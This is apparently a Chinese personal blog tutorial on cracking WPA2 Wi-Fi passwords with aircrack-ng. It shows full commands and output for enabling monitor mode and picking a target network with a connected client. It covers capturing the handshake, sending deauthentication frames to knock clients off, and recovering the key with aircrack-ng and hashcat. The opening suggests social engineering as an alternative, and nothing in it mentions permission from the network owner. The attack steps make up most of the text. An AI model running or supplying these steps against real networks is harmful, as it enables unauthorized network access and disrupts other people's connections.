可以用 某钥匙 直接连接就好啦
或者 直接走社会工程学 吧

前提

  • wifi 有设备使用且信号强度可以
  • 可以抓握手包
  • 大概猜得出密码类型
  • 有显卡将更快的破出密码

研究中

安装软件

1
# pacman -S aircrack-ng

查看可用网卡

1
2
3
4
5
# airmon-ng

PHY	Interface	Driver		Chipset

phy0	wlp2s0		iwlwifi		Intel Corporation Wi-Fi 6 AX210/AX211/AX411 160MHz (rev 1a)

开启设备监听模式

1
# airmon-ng start wlp2s0

寻找一个目标

找一个 有连接 STATION 的 且信号 PWR 还行的 且名字 ESSID 喜欢的

1
2
3
4
5
6
7
8
9
10
# airodump-ng wlp2s0mon
 CH  1 ][ Elapsed: 6 s ][ 2023-08-18 23:38

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 5E:DE:34:29:4F:E4  -46  78       51        7    1   1  360   WPA2 CCMP   PSK  p

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 5E:DE:34:29:4F:E4  54:0E:58:F1:45:09  -28    0 - 6e   228      157
  • BSSID5E:DE:34:29:4F:E4ESSIDp 的 并且有一个设备连接的 这个 幸运儿了

获取握手包

开始握手抓包

1
2
3
4
5
6
7
8
9
10
11
# airodump-ng -w wifi_p -c 1 --bssid 5E:DE:34:29:4F:E4 wlp2s0mon

 CH  1 ][ Elapsed: 1 min ][ 2023-08-18 23:41 ][ WPA handshake: 5E:DE:34:29:4F:E4

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 5E:DE:34:29:4F:E4  -58  68      678      689   65   1  360   WPA2 CCMP   PSK  p

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 5E:DE:34:29:4F:E4  54:0E:58:F1:45:09  -37    1e- 6e  1099     1660  EAPOL  p
  • -w 保存的文件名
  • -c 信道 CH 字段
  • --bssid 目标的 mac 地址

当看到 WPA handshake 时 就说明获得握手包了

不管有没有成功 使用了 -w 参数 都会保存本次结果

攻击对方更快的获得握手包

1
2
3
4
5
6
7
8
[root@p-redmibook puzzle]# aireplay-ng -0 3 -a 5E:DE:34:29:4F:E4 wlp2s0mon
23:41:46  Waiting for beacon frame (BSSID: 5E:DE:34:29:4F:E4) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
23:41:46  Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
23:41:46  Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
23:41:47  Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
23:41:47  Sending DeAuth (code 7) to broadcast -- BSSID: [5E:DE:34:29:4F:E4]
  • -0 攻击模式 断开连接
  • 3 共计次数 0 无线
  • -a 目标的 mac 地址
  • -c 指定连接设备 不指定则是所有

破解握手包

生成字典

1
echo 'qaz123456' > wifi_password.dict

用字典破解握手包

自带的 cpu 方式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# aircrack-ng -w wifi_password.dict wifi_p-01.cap
Reading packets, please wait...
Opening wifi_p-01.cap
Read 6644 packets.

   #  BSSID              ESSID                     Encryption

   1  5E:DE:34:29:4F:E4  p                         WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening wifi_p-01.cap
Read 6644 packets.

1 potential targets



                               Aircrack-ng 1.7

      [00:00:00] 1/1 keys tested (39.93 k/s)

      Time left: --

                           KEY FOUND! [ qaz123456 ]


      Master Key     : 1D 02 19 7B 71 FF F2 E0 3D 45 06 81 6D 0B 61 D3
                       B6 37 49 89 4C 5F 98 09 A8 30 11 96 E9 A1 8E B4

      Transient Key  : 99 DF F0 C4 41 F8 3A FF D9 E1 DB CB 0B F2 BB 93
                       2D 37 44 6F 4B 53 86 5C F0 15 CE 64 E0 C8 00 08
                       AD A9 5D 7E 7E 4C 5C E6 82 D4 9D CF 72 AD 8D 20
                       B5 0C F9 F8 5E D8 BB 01 FC 1A C3 BB E4 31 A2 9A

      EAPOL HMAC     : DB FD 4A 90 FC 1D 4A 90 EF B3 02 12 EF 51 85 9C
  • -w 字典文件

采用 hascat gpu 模式

cap 文件转为 hascat 认的格式
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ hcxpcapngtool wifi_p-01.cap -o wifi_p-01.hash
hcxpcapngtool 6.3.0 reading from wifi_p-01.cap...

summary capture file
--------------------
file name................................: wifi_p-01.cap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 18.08.2023 23:40:25
timestamp maximum (GMT)..................: 18.08.2023 23:41:57
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11 (105) very basic format without any additional information about the quality
endianness (capture system)..............: little endian
packets inside...........................: 6644
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 1
ACTION (total)...........................: 53
PROBEREQUEST (directed)..................: 4
PROBERESPONSE (total)....................: 79
DEAUTHENTICATION (total).................: 2561
AUTHENTICATION (total)...................: 6
AUTHENTICATION (OPEN SYSTEM).............: 6
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
WPA encrypted............................: 689
EAPOL messages (total)...................: 8
EAPOL RSN messages.......................: 8
EAPOLTIME gap (measured maximum msec)....: 2695
EAPOL ANONCE error corrections (NC)......: not detected
EAPOL M1 messages (total)................: 2
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 7
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

session summary
---------------
processed cap files...................: 1
感受显卡的香味
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
$ hashcat -m 22000 wifi_p-01.hash wifi_password.dict
hashcat (v6.2.6) starting

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.2)
====================
* Device #1: NVIDIA GeForce RTX 2050, 3827/3904 MB, 16MCU

OpenCL API (OpenCL 3.0 CUDA 12.2.135) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce RTX 2050, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1075 MB

Dictionary cache built:
* Filename..: wifi_password.txt
* Passwords.: 1
* Bytes.....: 10
* Keyspace..: 1
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

dbfd4a90fc1d4a90efb30212ef51859c:ea6dcb4ac62e:bc6ad15e5197:p:qaz123456

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: wifi_p-01.hash
Time.Started.....: Sat Aug 19 00:02:57 2023 (0 secs)
Time.Estimated...: Sat Aug 19 00:02:57 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (wifi_password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       56 H/s (0.09ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: qaz123456 -> qaz123456
Hardware.Mon.#1..: Temp: 42c Util: 94% Core:1702MHz Mem:7000MHz Bus:4

Started: Sat Aug 19 00:02:54 2023
Stopped: Sat Aug 19 00:02:58 2023

停止设备监听模式

1
airmon-ng stop wlp2s0mon

其他

获取隐藏的 ssid

和 抓取握手包方式类似

还是继续攻击 有设备连接的时候 这个名字会显示出来的

获取 5g wifi的包

todo

参考地址